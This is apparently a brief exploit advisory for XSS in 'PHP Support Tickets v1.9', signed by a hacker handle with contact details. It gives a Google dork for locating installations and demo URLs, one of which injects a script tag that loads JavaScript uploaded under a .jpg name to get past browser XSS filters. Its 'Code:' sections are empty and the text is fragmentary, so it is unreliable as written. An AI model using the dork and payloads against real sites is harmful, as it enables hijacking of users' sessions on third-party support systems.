Google dork: "PHP Support Tickets v1.9" inurl:index.php?action= "PHP Support Tickets v1.9" by "Triangle Solutions Ltd" allows XSS attack at index.php and some implementations also has a bad uploaded files validation allowing to upload a js with a jpg extension that could be using for bypassing XSS browser filters. Demo 1 (XSS): url: http://server.com/app_folder/index.php?action=Register

Sys_A501% 20@%20Raza-Mexicana.org

Code: Demo 2 (JS as JPEG): url: http://server.com/app_folder/index.php?action=Login%3Cscript%20src=./upload/ 1671.jpg%3E%3C/script%3E Code:
Register

Sys_A501 @ Raza-Mexicana.org

Sys_A501 sys_a501@raza-mexicana.org sys.a501@gmail.com www.raza-mexicana.org http://inrootwetrust.org.mx/
Login